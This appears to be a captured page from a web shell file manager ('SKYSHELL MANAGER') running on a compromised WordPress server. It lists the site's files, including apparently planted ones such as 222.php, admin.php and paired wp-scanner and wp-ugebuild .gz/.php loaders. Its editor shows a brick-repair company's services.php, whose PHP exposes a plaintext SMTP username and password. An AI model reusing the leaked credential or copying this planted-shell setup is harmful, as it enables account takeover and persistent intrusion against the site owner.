📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: services.php
<!-- Author: W3layouts Author URL: http://w3layouts.com License: Creative Commons Attribution 3.0 Unported License URL: http://creativecommons.org/licenses/by/3.0/ --> <!DOCTYPE html> <html> <head> <title>Repairbricks</title> <!--/tags --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Instruction Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyEricsson, Motorola web design" /> <script type="application/x-javascript"> addEventListener("load", function () { setTimeout(hideURLbar, 0); }, false); function hideURLbar() { window.scrollTo(0, 1); } </script> <!--//tags --> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/font-awesome.css" rel="stylesheet"> <!-- //for bootstrap working --> <link href="//fonts.googleapis.com/css?family=Work+Sans:200,300,400,500,600,700" rel="stylesheet"> </head> <body> <!-- header --> <div class="header-1"> <div class="agileits_top_menu"> <div class="w3l_header_left"> <ul> <li><i class="fa fa-phone" aria-hidden="true"></i> 770-227-7913</li> <li><i class="fa fa-envelope-o" aria-hidden="true"></i> <a href="mailto:contact@repairbricks.com">contact@repairbricks.com</a></li> </ul> </div> <div class="clearfix"> </div> </div> <div class="content white agile-info"> <nav class="navbar navbar-default" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="index.php"> <img src="images/newlogo.png" class="img-responsive" alt=""/> </a> </div> <!--/.navbar-header--> <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"> <nav class="link-effect-2" id="link-effect-2"> <ul class="nav navbar-nav"> <li><a href="index.php" class="effect-3">Home</a></li> <li><a href="about.php" class="effect-3">About</a></li> <li class="active"><a href="services.php" class="effect-3">Services</a></li> <li><a href="gallery.php" class="effect-3">Gallery</a></li> <li><a href="contact.php" class="effect-3">Contact</a></li> </ul> </nav> </div> <!--/.navbar-collapse--> <!--/.navbar--> </div> </nav> </div> </div> <!-- //header --> <!-- services --> <div class="banner-bottom"> <div class="container"> <h3 class="heading-agileinfo">Services<span>Our auto repair services include:</span></h3> <div class="w3ls_banner_bottom_grids"> <div class="col-md-4 agileits_services_grid"> <h3>Stonework and Masonry</h3><br> <h4>Quality Stonework & Masonry Contractors</h4> <p>Are you looking to rejuvenate or modernize your home with the installation of a new fireplace or outdoor patio? Our team members at Repairbricks are the local experts of anything related to stonework and masonry in USA, and we are prepared to show you what we can do! </p> <div class="w3_agile_services_grid1"> <img src="images/s1.jpg" alt=" " class="img-responsive" /> <div class="w3_blur"></div> </div> <div class="w3layouts_more"> <a href="#" data-toggle="modal" data-target="#myModal">Learn More<i class="fa fa-long-arrow-right" aria-hidden="true"></i></a> </div> </div> <div class="col-md-4 agileits_services_grid"> <h3>Fireplace Installation & Repair</h3> <p>There’s no better feeling than opening your front door and being met with the warmth and comfort of a fireplace. It allows your home to be a place of complete relaxation and comfort. If you've been thinking of installing a fireplace in your home, reach out to the professionals at Repairbricks for quality work from start to finish.</p> <div class="w3_agile_services_grid1"> <img src="images/s2.jpg" alt=" " class="img-responsive" /> <div class="w3_blur"></div> </div> <div class="w3layouts_more"> <a href="#" data-toggle="modal" data-target="#myModal1">Learn More<i class="fa fa-long-arrow-right" aria-hidden="true"></i></a> </div> </div> <div class="col-md-4 agileits_services_grid"> <h3>Chimney Installation & Repair</h3> <p>Having a properly working chimney is essential to any home, especially one that has a fireplace. When a fire burns, it releases toxic gases into the air that need to be directed outside. Among these toxic gasses could be carbon monoxide, which is an odorless and colorless gas, so unfortunately a lot of people don’t even know it’s there until it’s too late. </p> <div class="w3_agile_services_grid1"> <img src="images/s3.jpg" alt=" " class="img-responsive" /> <div class="w3_blur"></div> </div> <div class="w3layouts_more"> <a href="#" data-toggle="modal" data-target="#myModal2">Learn More<i class="fa fa-long-arrow-right" aria-hidden="true"></i></a> </div> </div> <div class="clearfix"> </div> </div> </div> </div> <!-- //services --> <!-- offer --> <div class="offer"> <div class="container"> <div class="w3ls_banner_bottom_grids"> <div class="col-md-4 agile_offer_grid"> <div class="agileits_w3layouts_offer_grid"> <div class="agile_offer_grid_pos"> <p>01.</p> </div> </div> <div class="wthree_offer_grid1"> <h4>Safe & Secure </h4> <p class="w3_agileits_service_para">Your home isn’t just another investment, it is a shelter and refuge for you and your family.</p> </div> </div> <div class="col-md-4 agile_offer_grid"> <div class="agileits_w3layouts_offer_grid"> <div class="agile_offer_grid_pos"> <p>02.</p> </div> </div> <div class="wthree_offer_grid1"> <h4>Lasting Value </h4> <p class="w3_agileits_service_para">Unlike other building materials, brick requires almost no upkeep to maintain in perfect condition.</p> </div> </div> <div class="col-md-4 agile_offer_grid"> <div class="agileits_w3layouts_offer_grid"> <div class="agile_offer_grid_pos"> <p>03.</p> </div> </div> <div class="wthree_offer_grid1"> <h4>Eco-Friendly </h4> <p class="w3_agileits_service_para">Our bricks are made from clay and shale, which are natural resources found in abundance here in USA.</p> </div> </div> <div class="clearfix"> </div> </div> </div> </div> <!-- //offer --> <!-- offer-bottom --> <div class="banner-bottom"> <div class="container"> <div class="col-md-12 w3l_services_footer_top_right"> <div class="w3l_services_footer_top_right_main"> <div class="w3l_services_footer_top_right_main_l"> <h3>Stage 1</h3> </div> <div class="w3l_services_footer_top_right_main_l1"> <img src="images/i1.png" class="img-responsive" alt=""/> </div> <div class="w3l_services_footer_top_right_main_r"> <a href="#" data-toggle="modal">Site visit: </a> <p>A Repairbricks representative will visit the job site, as all specifications should be tested by the product manufacturer. The visit is arranged at the request of the engineer, the owner or the contractor.</p> </div> <div class="clearfix"> </div> </div> <div class="w3l_services_footer_top_right_main"> <div class="w3l_services_footer_top_right_main_l"> <h3>Stage 2</h3> </div> <div class="w3l_services_footer_top_right_main_l1"> <img src="images/i2.png" class="img-responsive" alt=""/> </div> <div class="w3l_services_footer_top_right_main_r"> <a href="#" data-toggle="modal">Pull-out tests: </a> <p>On various areas of the building to be repaired, Repairbricks undertakes a series of pull-out tests in all the different materials present, both in the façade and the backup, to ensure use of the correct tie(s) and installation procedures.</p> </div> <div class="clearfix"> </div> </div> <div class="w3l_services_footer_top_right_main"> <div class="w3l_services_footer_top_right_main_l"> <h3>Stage 3</h3> </div> <div class="w3l_services_footer_top_right_main_l1"> <img src="images/i3.png" class="img-responsive" alt=""/> </div> <div class="w3l_services_footer_top_right_main_r"> <a href="#" data-toggle="modal">Report:</a> <p> Following the on-site testing, Repairbricks produces a thorough report for the engineer with recommendations as to the most suitable tie(s), including their length and diameter, together with the relevant repair details and itemized method statements.</p> </div> <div class="clearfix"> </div> </div><br> <div class="w3l_services_footer_top_right_main"> <div class="w3l_services_footer_top_right_main_l"> <h3>Stage 4 </h3> </div> <div class="w3l_services_footer_top_right_main_l1"> <img src="images/i4.png" class="img-responsive" alt=""/> </div> <div class="w3l_services_footer_top_right_main_r"> <a href="#" data-toggle="modal">Collaboration:</a> <p>Repairbricks works closely with the contractor carrying out the tie installation, supplying all necessary materials to site and undertaking all the required training of their operatives to enable efficient installation.</p> </div> <div class="clearfix"> </div> </div><br> <div class="w3l_services_footer_top_right_main"> <div class="w3l_services_footer_top_right_main_l"> <h3>Stage 5 </h3> </div> <div class="w3l_services_footer_top_right_main_l1"> <img src="images/i5.png" class="img-responsive" alt=""/> </div> <div class="w3l_services_footer_top_right_main_r"> <a href="#" data-toggle="modal">Support:</a> <p>Repairbricks provides any required on-going support and advice and will visit the site again if further pull-out tests are requested or if the contractor has any other concerns.</p> </div> <div class="clearfix"> </div> </div><br> <div class="w3l_services_footer_top_right_main"> <div class="w3l_services_footer_top_right_main_l"> <h3>Stage 6 </h3> </div> <div class="w3l_services_footer_top_right_main_l1"> <img src="images/i6.png" class="img-responsive" alt=""/> </div> <div class="w3l_services_footer_top_right_main_r"> <a href="#" data-toggle="modal">Guarantee:</a> <p>On completion of the repairs, and where Repairbricks products have been installed as specified, the work is covered by our $7m public and products liability insurance.</p> </div> <div class="clearfix"> </div> </div> </div> <div class="clearfix"> </div> </div> </div> <!-- //offer-bottom --> <!-- footer --> <div class="footer_top_agileits"> <div class="container"> <div class="col-md-4 footer_grid"> <h3>Go Green with Red Brick</h3> <p align="justify">While brick is a naturally excellent insulator, we offer several designs that can boost the thermal efficiency of your building even further. These properties ease the burden on your HVAC system, allowing you to stay comfortable year-round while saving money on maintenance and repair costs, as well as your monthly power bill. With brick, you can say goodbye for good to drafts entering your house.</p> </div> <div class="col-md-4 footer_grid"> <h3>A Smarter Investment</h3> <p align="justify">Brick has been around for thousands of years, and it doesn’t look to be going out of fashion any time soon. With rustic good looks and timeless class, brick houses only ever increase in value. When considering the aforementioned savings together with enhanced resale value, it becomes clear that brick is the material you can’t afford NOT to build with! </p> </div> <div class="col-md-4 footer_grid"> <h3>Contact Info</h3> <ul class="address"> <li><i class="fa fa-map-marker" aria-hidden="true"></i>1645 Lakes Pkwy,Lawrenceville, <span>GA 30043,USA</span></li> <li><i class="fa fa-envelope" aria-hidden="true"></i><a href="mailto:contact@repairbricks.com">contact@repairbricks.com</a></li> <li><i class="fa fa-phone" aria-hidden="true"></i>770-227-7913</li> </ul> </div> <div class="clearfix"> </div> <div class="footer_grids"> <div class="col-md-4 footer_grid_left"> <h3>Sign up for our Newsletter</h3> </div> <div class="col-md-8 footer_grid_right"> <form action="#" method="post"> <input type="email" name="email1" placeholder="Enter Email Address..." required=""> <input name="Subscribe" type="submit" value="Subscribe"> </form> <?php //subscribe form if (isset($_POST['Subscribe'])){ $email1=$_REQUEST['email1']; if (($email1=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/repairbricks/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.Yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@repairbricks.com'; $mail->Password = 'FUVaj86J7PJaGQ'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "poovarasi@webberax.com"; //$mail->FromName = "Poovarasi"; $mail->setFrom('contact@repairbricks.com', 'repairbricks'); //To address and name $mail->addAddress($email1, $name1); //$mail->addAddress('aswini@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@repairbricks.com", "Reply"); //CC and BCC //$mail->addCC("aswinihari6@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "This e-mail was sent from a subscribe form on (http://repairbricks.com)"; $mail->Body = "<i>This e-mail was sent from a subscribe form on (http://repairbricks.com)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Message has been sent successfully"; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.Yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@repairbricks.com'; $mail2->Password = 'FUVaj86J7PJaGQ'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@repairbricks.com', 'repairbricks'); $mail2->addAddress('contact@repairbricks.com', 'repairbricks'); $mail2->isHTML(true); $mail2->Subject = "Subscribed Details"; $mail2->Body = "<strong>Following user has subscribed your website <strong><br> Email : $email1<br>"; $mail2->send(); } } ?> </div> <div class="clearfix"> </div> </div> </div> </div> <div class="footer_w3ls"> <div class="container"> <div class="footer_bottom1"> <a href="privacy.php">Privacy Policy</a> | <a href="terms.php">Terms and Conditions</a> | <a href="unsubscribe.php">Unsubscribe</a><br> <p>© 2018 Repairbricks. All rights reserved</p> </div> </div> </div> <!-- //footer --> <!-- modal --> <div class="modal about-modal fade" id="myModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <h4 class="modal-title">Stonework and Masonry</h4><br> <h5>Quality Stonework & Masonry Contractors</h5> </div> <div class="modal-body"> <div class="agileits-w3layouts-info"> <img src="images/s1.jpg" class="img-responsive" alt="" /> <p>Are you looking to rejuvenate or modernize your home with the installation of a new fireplace or outdoor patio? Our team members at Repairbricks are the local experts of anything related to stonework and masonry in USA, and we are prepared to show you what we can do! </p> <p>No other company can provide you with Repairbricks quality masonry work like we can. From residential to commercial services, we have a reputation for building excellence from the ground up. We strive to give you stonework and masonry service in a cost-effective way to save you as much money as possible, while still providing you with the very best in quality. Our commitment is to you, and we will always go above and beyond to ensure that you’re completely satisfied with our work.</p> <strong>Our list of stone and masonry work includes:</strong> <ul> <li>ew Construction and Repair</li> <li>Patios</li> <li>Sidewalks</li> <li>Chimney Installation and Repair</li> <li>Fireplace Installation and Repair</li> <li>Retainer Walls</li> <li>Foundations</li> <li>And much more!</li></ul> <p>Whatever you’re in the market for, our professionals can surely accommodate you and leave your home and property looking its very best. If you have a special project you’re looking into and don’t see anything about it on our website, give our experts a call for an evaluation of your property.</p> </div> </div> </div> </div> </div> <div class="modal about-modal fade" id="myModal1" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <h4 class="modal-title">Fireplace Installation & Repair</h4><br> <h5>Masonry Contractors Specializing in Fireplace Installation & Repair</h5> </div> <div class="modal-body"> <div class="agileits-w3layouts-info"> <img src="images/s21.jpg" class="img-responsive" alt="" /> <p>There’s no better feeling than opening your front door and being met with the warmth and comfort of a fireplace. It allows your home to be a place of complete relaxation and comfort. If you've been thinking of installing a fireplace in your home, reach out to the professionals at Repairbricks for quality work from start to finish.</p> <h5>Skilled Masonry Fireplace Installation Professionals!</h5> <p>When having a fireplace installed in your home, many safety factors come into play. Our skilled professionals ensure that the fireplace you want is installed safely. In addition, we can also provide repairs to a currently installed fireplace. Leaving your fireplace unrepaired can be dangerous to your home and everyone under your roof. </p> <h5>Fireplace Safety Is Our #1 Priority</h5> <p>Don’t wait until a hazardous fire occurs; allow us to take care of the issue right away and keep you and your family safe. Contact us today for more information! </p> </div> </div> </div> </div> </div> <div class="modal about-modal fade" id="myModal2" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <h4 class="modal-title">Instruction</h4> </div> <div class="modal-body"> <div class="agileits-w3layouts-info"> <img src="images/s31.jpg" class="img-responsive" alt="" /> <p>Having a properly working chimney is essential to any home, especially one that has a fireplace. When a fire burns, it releases toxic gases into the air that need to be directed outside. Among these toxic gasses could be carbon monoxide, which is an odorless and colorless gas, so unfortunately a lot of people don’t even know it’s there until it’s too late. This is why if you notice your chimney is having issues, you should call one of our professional Repairbricks experts as soon as possible. Even if you aren’t sure if something is wrong with your chimney, we offer free evaluations so it is better to be safe than sorry! </p> <p>Having a fireplace in your home is a luxury, especially during the cold months we have in USA. So be proactive, keep your family safe, and call one of our experts today to examine your chimney.</p> <h5>When You’re in Need of Quality Chimney Repair, Count On Us</h5> <p>Our highly-trained staff will go above and beyond to ensure that the safety of you, your family and your home remains intact. Whether you’re in need of chimney repair or installation, we’re the ones to rely on every time. Our fully-licensed and experienced staff can provide you with a thorough chimney inspection when you call 770-227-7913 today!</p> <h5>Chimney Maintenance & Inspections</h5> <p>It’s recommended that those with either a wood-burning or oil chimney have a maintenance check every year, especially before the winter season begins. If you’d like to have your chimney inspected before you start utilizing it fully in the cold weather, then call on us for a thorough maintenance check.</p> <h5>Improve Your Home's Value!</h5> <p>In addition, if you’re looking to fix the look of your chimney so that it adds to the look of your home, we can also help with that. Our professionals will go above and beyond to ensure that you are completely satisfied with how your chimney appears and how well it operates. Keep your home safe and looking its very best with our help. Give us a call for immediate assistance today! </p> </div> </div> </div> </div> </div> <!-- //modal --> <a href="#home" class="scroll" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> <!-- js --> <script type="text/javascript" src="js/jquery-2.1.4.min.js"></script> <script type="text/javascript" src="js/bootstrap.js"></script> </body> </html>
Save